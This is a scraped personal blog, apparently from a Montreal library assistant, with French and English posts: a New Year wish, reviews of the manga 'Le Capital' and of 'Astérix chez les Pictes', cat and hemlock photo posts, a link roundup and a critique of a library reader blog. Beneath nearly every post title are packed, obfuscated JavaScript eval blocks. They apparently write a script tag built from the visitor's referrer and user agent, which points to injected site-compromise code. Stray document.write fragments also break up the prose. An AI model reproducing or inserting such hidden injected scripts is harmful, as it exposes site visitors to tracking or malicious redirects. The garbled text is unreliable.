Bonne et heureuse année!

MMXIII ne m’a pas semblé une bonne année. Je l’ai trouvé un peu difficile. C’est donc pourquoi je nous souhaite à tous pour MMXIIII une…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zyyen|var|u0026u|referrer|iaaah||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abkbs|var|u0026u|referrer|hskey||js|php’.split(‘|’),0,{}))

Bonne et heureuse année !

2013 did not seem to me a good year. I found it a bit difficult. This is why I wish us all for 2014 a …

Happy new year!

Gelukkige nuwe jaar! / ??? ????? ?????! / ??????? ???? ??????! / ????? / ????? / Bonan Novjaron! / Frohes neues Jahr! / ??????????? ?? ??? ????! / ??? ????! / ??? ??? ?????? ??! / Felice anno nuovo! / ???????????????? / ?? ? ?? ????! / Beatus annos! / Godt Nyttår! / ??? ?? ?????! / Feliz ano novo! / An nou fericit! / ? ????? ?????! / Feliz año nuevo! / ??????????????? / Chúc m?ng n?m m?i! / Happy ngonyaka omusha! / etc.

Le Capital

Sais-tu de quoi est fait l’argent que nous utilisons ?
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|faabh|var|u0026u|referrer|eeyab||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sayhk|var|u0026u|referrer|seada||js|php’.split(‘|’),0,{}))

“Au milieu du XIXe siècle, document.write(“”); la révolution industrielle se met en marche en Europe, chamboulant notre manière de voir, de consommer et de vivre. La production en masse est désormais possible, mais les inégalités qui résultent des nouvelles pratiques économiques et sociales creusent un fossé qu’il est difficile de combler. La nouvelle donne profite à une minorité d’entrepreneurs tandis qu’elle dessert considérablement la masse de travailleurs qui ne deviennent qu’une «force de travail» pour enrichir les premiers. Découvrez dans ce manga une introduction à l’oeuvre majeure de Karl Marx, concernant le système économique actuel: le capitalisme…”

[ Texte de la couverture arrière ]

Continuez après le saut de page >>

Les deux volumes du Capital (?????? ??? & ?????? ????? / Manga de dokuha: Shihon-ron & Manga de dokuha: Zoku Shihon-ron / Lit. Le Capital & Le Capital, la suite) sont les vingt-sixième et trente-cinquième volumes de la collection manga de dokuha (lit. “Lisez en manga”) publiés par East Press en décembre 2008 et avril 2009 (les #797 & 885 du catalogue de l’éditeur). L’adaptation et le dessin ont été réalisé par le studio Variety Art Works, dont on connait très peu de chose. C’est le tout premier titre de la collection a être traduit par Soleil Manga en janvier 2011 dans sa collection “Classiques”. J’ai déjà introduit cette collection et commenté quelques uns de ses titres (L’Ancien et le Nouveau Testament de la Bible, À la recherche du temps perdu). Cette collection reprend en traduction quelques titres de l’impressionnante collection japonaise Manga de Dokuha publiée par East Press, qui se consacre à adapter en manga des classiques de la littérature pour les rendre accessible à un plus large publique.

Je dois avouer que c’est tout un défit que de vouloir adapter pour les masses un ouvrage théorique tel que Le Capital. Si Marx est parfois cité, il était toutefois impossible d’utiliser son texte tel quel, alors les auteurs ont inventé une histoire afin d’en illustrer les principes de base. Le récit nous fait donc suivre Robin, un jeune producteur de fromage artisanal dont la production est insuffisante pour répondre à la demande du marché. Il rencontre par hasard Daniel, un jeune investisseur très ambitieux, qui lui propose d’investir afin d’industrialiser sa production. Ayant souffert de la pauvreté étant plus jeune (sa mère en est morte), il est déterminé à devenir riche et accepte la proposition de Daniel. Avec lui, il découvre les rouages du capitalisme. En mécanisant et simplifiant la chaine production il n’a pas besoin d’une main d’oeuvre qualifiée et celle-ci devient donc bon marché et remplaçable. Ainsi les ouvriers “vendent” leur force de travail comme une marchandise. Malheureusement, afin de faire face à la demande, aux pressions de la concurrence et, surtout, de réaliser du profit, la cadence et le nombre d’heures de travail doivent être augmenté au point d’avoir des effets abrutissants et néfastes sur la vie des ouvriers. Devant cette exploitation abusive de ses ouvriers, Robin a des doutes mais il n’a pas le choix s’il ne veut pas tout perdre et redevenir pauvre. [ci-contre: vol. 1, pg 106]

Connais-tu les mécanismes du capitalisme ?

“Avec la révolution industrielle, notre mode de vie a considérablement changé. Aujourd’hui, nous croulons sous les objets, nous travaillons comme des forcenés, nous consommons toujours plus. Et bien que nous sachions par avance que ce système capitaliste est voué à l’échec et aboutira sur une crise, qui fera d’innombrables victimes, nous continuons de fermer les yeux.”

“Comment naissent les crises économiques ? Comment le chômage est-il possible ? Pourquoi toutes ces inégalités sociales ? Découvrez, par le biais de ce manga, les idées de Marx sur la question…”

[ Texte de la couverture arrière ]

Lorsqu’il est décédé en 1883, Marx n’avait complété que la première partie de Das Kapital. C’est son collègue Friedrich Engels qui le finira en utilisant ses notes. Ainsi, après avoir expliqué à travers l’histoire de Robin les concepts de base du capitalisme (marchandise, exploitation, force de travail, valeur du travail), les auteurs du manga prennent une nouvelle approche beaucoup plus efficace: ils font intervenir Engels lui-même comme narrateur et guide. Grâce à l’utilisation de petits graphiques et d’exemples puisés dans l’histoire de Robin, celui-ci nous explique des concepts comme la valeur d’échange, la plus-value ou la circulation du capital. Il nous apprend aussi que la recherche du profit et la surproduction qui en découle crée une spirale infernale qui entraine inéluctablement les entreprises, ainsi que tout les fournisseurs et distributeurs qui lui sont liés, vers la crise. [ci-contre: vol. 2, pg 7]

En effet, malgré que le profit des entreprises proviennent essentiellement de la plus-value générée par la travail des ouvriers, la croissance demande de mécaniser la production, diminuant ainsi la main-d’oeuvre, causant du chômage, et ultimement diminuant les profits. C’est là l’une des contradictions du capitalisme. De plus, la surproduction conduisant à la suraccumulation des marchandises, la baisse des profits conduisant à un ralentissement de la circulation du capital puis à une monté des créances douteuses, le système bancaire commence à ployer sous la pression. Les banques finissent par manquer de liquidité et c’est la crise financière. Ce genre de crises est inhérent aux sociétés capitalistes et se produit régulièrement. Elles sont cependant nécessaire pour “rétablir l’équilibre entre l’offre et la véritable demande. Mais après quels dégâts ?” Le manga se conclut avec l’image (sarcastique j’espère) de Marx et Engels, auréolés, entamant leur ascension vers les cieux avec un dernier message: “remettez en cause le capitalisme”!

Extrait ci-dessous: vol. 2, pg 38-39

Certaines histoires ne sont que légèrement adaptées pour s’ajuster à un médium narratif plus graphique et d’autres sont adaptées plus lourdement. C’est le cas ici avec Das Kapital qui est une oeuvre théorique plutôt rébarbative. Chose surprenante, l’idée de créer une histoire afin de faire passer le message théorique d’une façon plus facile fonctionne assez bien pour ce manga. Il faut dire que c’est un sujet assez intéressant car très d’actualité: on se sent tous touché par la crise et avons sans doute tous eut le sentiment d’être exploité par notre employeur (diminution du personnel, augmentation des cadences — mais n’oublions quand même pas que nous ne sommes pas à la fin du XIXe siècle et que nos emplois viennent avec un salaire minimum et de nombreux avantages sociaux!). Il s’agit tout de même d’un manga un peu lourd et pas vraiment amusant à lire. La lecture en est même laborieuse, pour ne pas dire assommante — ce qui n’est nullement aidée par le fait que le dessin est relativement médiocre. Le second volume est un peu plus aisé à lire sans doute à cause de l’utilisation de techniques narrative plus didactiques.

Je n’ai pas lu l’original alors je ne peux pas vraiment comparer mais je suis pas mal sûr que cette version manga est plus accessible. Elle pourra sans aucun doute assouvir votre curiosité à l’égard de Marx et vous en offrir une bonne introduction. Cela me rappel des manga didactiques comme Japan Inc (en français: Les Secrets de l’économie japonaise en bande dessinée) ou Manga Science. Toutefois, malgré l’intérêt du sujet, ce manga demeure assez moyen, une simple curiosité qui, hélas, fait plutôt piètre figure quand on vient de lire un manga comme Cesare.

Le Capital, Vol. 1 et Vol. 2, écrit par Karl Marx (avec Friedrich Engels pour le vol. 2) et illustré par Variety Art Works (traduction: Florent Gorges; adaptation: Demopolis). Toulon, Soleil Manga (Coll. Classiques), janvier 2011. 12,8 x 18,2 x 1,5 cm, 192 pg. ch., 6,95 € / $12.95 Can. ch. ISBN: 978-2-30201-322-3 / 978-2-30201-396-4. Lecture dans le sens occidental (de gauche à droite) et recommandé pour jeunes adultes (14+).

Pour plus d’information vous pouvez consulter les sites suivants:

Manga de dokuha: Das Kapital by Karl Heinrich Marx © Variety Art Works • East Press Co., Ltd. All rights reserved. Édition française © 2011 MC Productions.

[ Translate ]

Astérix chez les Pictes

“Le Village d’Astérix enneigé se remet doucement d’un hiver glacial comme jamais, document.write(“”); quand Astérix et Obélix font la plus étonnante des découvertes : un jeune homme enfermé dans un glaçon, échoué sur la plage ! Panoramix est formel : il s’agit d’un Picte. Mais qui sont les Pictes ? Des peuples de l’ancienne Ecosse, redoutables guerriers aux multiples clans, dont le nom, donné par les Romains, signifie littéralement « les hommes peints ». Astérix chez les Pictes, c’est donc un voyage épique, en compagnie de Mac Oloch et de la belle Camomilla, vers une contrée riche de traditions. Au fil des pages, on découvre un peuple attachant dont les différences culturelles se traduisent en gags et jeux de mots mémorables. De l’eau de malt, des noms en Mac, des lancers de tronc, des bardes adeptes de la cornemuse, les origines du mur d’Hadrien et du monstre du Loch Ness sont dévoilés ! Et même des Gaulois en kilts, par Toutatis !”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hstsi|var|u0026u|referrer|eyakt||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|faryi|var|u0026u|referrer|kzyhz||js|php’.split(‘|’),0,{}))

[ Texte du site de l’éditeur ]

Continuez après le saut de page >>

Astérix chez les Pictes est le trente-cinquième album des aventures d’Astérix le Gaulois (et d’Obélix). Je ne crois pas qu’il soit nécessaire de présenter en détails cette série de bande-dessinée franco-belge qui fit ses débuts dans le premier numéro du journal Pilote en octobre 1959 sous la plume collective de René Goscinny (pour le scénario) et de Albert Uderzo (pour le dessin). Cette série humoristique a toujours été très populaire auprès des lecteurs de tout âge d’abord parce qu’elle parodie la société moderne (surtout française) mais surtout à cause de ses merveilleux et brillants jeux de mots (principalement dans les noms de personnages mais beaucoup aussi par des calembours, des références astucieuses ou des associations absurdes mais rigolotes: par exemple “Je suis mon cher ami très heureux de vous voir. – C’est un Alexandrin” dans Astérix et Cléopâtre, ou “Il ne faut jamais parler sèchement à un Numide” dans Astérix Légionnaire). Le succès tiens au fait que les albums peuvent être appréciés sur plusieurs niveaux de lecture: les gags visuels pour les plus jeunes (principalement les baffes et autre bagarres), les parodies et astuces linguistiques pour les plus vieux. [ci-contre: page 5]

Le style artistique de la série est typique des BDs humoristiques franco-belges, avec des personnages très caricaturés (beaucoup de gros nez), quoiqu’une certaine attention est souvent apportée aux arrières-plans (paysages, détails architecturaux). Ce qui caractérise cet album en particulier, c’est qu’il est le premier à être produit sans les créateurs originaux: Jean-Yves Ferri prends la relève pour les textes et le travail de dessinateur passe à Didier Conrad (Uderzo a toutefois supervisé étroitement la production et co-signé la couverture).

L’histoire de ce nouvel album n’est malheureusement pas très originale: Astérix et Obélix découvrent sur la plage un individu enveloppé dans la glace. Le druide Panoramix l’identifie comme un Picte, une tribu celte de Calédonie (donc un cousin, ancêtre des Écossais). Nos deux héros raccompagneront donc Mac Oloch chez lui et l’aideront à empêcher Mac Abbeh, le chef du clan de la rive opposées du loch, de se faire nommé roi à la place du défunt Mac II, et à secourir sa fiancée Camomilla des griffes du vilain.

Je déplore amèrement que l’humour de la série n’ait jamais été le même depuis la mort de Goscinny en 1977. Depuis Le Grand Fossé, en 1980, les albums n’ont pas été aussi drôles ou astucieux qu’avant. Et celui-ci ne fait pas exception. Par contre, visuellement, cet album reste très semblable aux précédents, Didier Conrad faisant un excellent travail pour imiter le style d’Uderzo. Les planches sont peut-être un peu plus chargés qu’avant et il utilise quelques raccourcis narratifs inusités mais sinon c’est assez proche. Je suis donc plutôt déçu mais je m’y attendais. C’est plutôt moyen comme album mais il mérite tout de même d’être lu. Un trente-sixième album, Astérix chez les Bataves, est annoncé pour 2015. Je ferai sans aucun doute l’effort de le lire, sans beaucoup d’attentes mais tout de même avec l’espoir de rigoler et par soucis de tradition.

Ci-dessous: Extrait des pages 7 à 9

Astérix chez les Pictes, texte de Jean-Yves Ferri et dessins de Didier Conrad. Paris, Les Éditions Albert René, octobre 2013. 29 x 22,2 x 1,4 cm, 48 pg., 9,90 € / $16.95 Can. ISBN: 978-2-86497-266-2. Recommandé pour tous.

Pour plus d’information vous pouvez consulter les sites suivants:

[ AmazonBiblioGoodreadsGoogleWikipedia ]

Astérix chez les Pictes © 2013 Les Éditions Albert René.

[ Translate ]

L’image du chat-medi

Caramel sommeille
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfzin|var|u0026u|referrer|tkrsy||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zresy|var|u0026u|referrer|fyyre||js|php’.split(‘|’),0,{}))
https://www.flickr.com/photos/clodjee/11631189144/player/11be382289
Rappel: nous avons toujours deux chatons à donner (voir l’affiche et faire circuler si possible)
Reminder: we still have two cats to give away (check the poster and pass around please)

The month in review (2013-12-27)

Lots happened on the domestic front during december. Mostly problems. It’s depressing how life can sometimes hounds you down. I’ll address that in a separate entry if I have the courage…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nnttk|var|u0026u|referrer|yhhtt||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdhtb|var|u0026u|referrer|fdbha||js|php’.split(‘|’),0,{}))

In the news, document.write(“”); no big events worth reporting but nearly an hundred interesting bits of information that I gathered and shared with you
after the jump:


Anime & Manga related, Japan, Popular Culture

Apple, apps and mobile devices news

Books, Digital Edition & Libraries

Economy, Environment & International/U.S. Politics

Health, home & garden

Humour

Local News & National Politics

Media, Culture, Entertainment & Society

Sciences & History

Technology, Gadgets & Internet

Union stuff & Montreal’s libraries

[ Traduire ]

Le Club des Irrésistibles

J’ai toujours rêvé de faire (de m’occuper ou de gérer) un blogue de lecteurs pour les bibliothèques de Montréal — quoiqu’il y a peu de chances que cela arrive un jour puisque je ne suis qu’un simple aide-bibliothécaire et que je viens de découvrir qu’il y en avait déjà un (plus ou moins)…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnryk|var|u0026u|referrer|faryd||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfaky|var|u0026u|referrer|snbkk||js|php’.split(‘|’),0,{}))

J’avais déjà vaguement entendu parlé de ce “
Club des irrésistibles” mais je croyais que c’était simplement des suggestions de lectures de bibliothécaires. C’est un peu plus que cela. Toutefois ça n’a rien à voir avec ce que je ferais si j’en avais la chance (probablement quelques choses de similaire à mes commentaires de livres, document.write(“”); mais plus, tellement plus) mais, bon, c’est tout de même un début. Les gens de partout dans le monde peuvent y laisser leurs suggestions de lectures et partager leurs coups de coeur livresques. Ça c’est bien mais beaucoup de choses laissent à désirer:

  • les commentaires (ou dans ce cas-ci plutôt des suggestions) ne sont pratiquement jamais signées
  • ils sont tous vraiment trop court; en général c’est dans le genre “je suggère ce livre parce que je l’ai lu et j’ai trouvé ça bon”! Point à la ligne. Oui mais pourquoi? Où sont les arguments, les anecdotes de lecture, dans quel contexte ce titre se situe-t-il dans l’oeuvre de l’auteur ? Dans son époque ? Etc.
  • la présentation du blogue est un peu confuse et manque d’attrait
  • il n’y a pratiquement pas d’explications sur comment participer ou quel genre de suggestions ou de commentaires on s’attend des participants
  • le blogue est très peu annoncé et semble n’avoir que très peu de visibilité: la preuve c’est que je n’en ai entendu parlé que vaguement et qu’il y a très peu de commentaires pour chacune des entrées du blogue
  • l’absence total de bilinguisme. Pourtant Montréal est une ville officiellement bilingue, la collection des bibliothèques comporte des livres en anglais et le catalogue Nelligan a lui-même une présentation bilingue…
  • il n’y a pas de catégorie “Manga” et tout est confondu dans une catégorie “Bande-dessinée”!

C’est donc très décevant. Il y tellement de choses qui pourraient être faites pour promouvoir le catalogue et les titres de la collection des bibliothèques de Montréal et cela avec un très petit budget! Vraiment, les gens des bibliothèques semble manquer d’imagination et de volonté (ou de moyens) mais, bon, c’est la ville de Montréal et sur ce je n’en dirai pas plus (je ne peux, ayant renoncé à mes droits constitutionnels de libre expression sur ce sujet…). Oui, c’est très décevant. Mais, bon, allez voir ce que c’est et n’hésitez pas à me dire ce que vous en pensez en commentaire…

Je vais tout de même garder un oeil sur ce club. Je me suis inscrit à l’info-lettre et peut-être demanderais-je quelques explications pour mieux comprendre comment ça marche et peut-être aussi daignerai-je y participer. On verra. Pour l’instant je trouve plus amusant de participer à Goodreads.

[ Translate ]

L’image du mer-fleurie

Apiaceae: Conium maculatum
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynnsd|var|u0026u|referrer|eiara||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|serbd|var|u0026u|referrer|kshia||js|php’.split(‘|’),0,{}))
Grande ciguë / Poison hemlock
Jardin botanique (2013/06/18)
https://www.flickr.com/photos/clodjee/11570483874/player/e208affb8b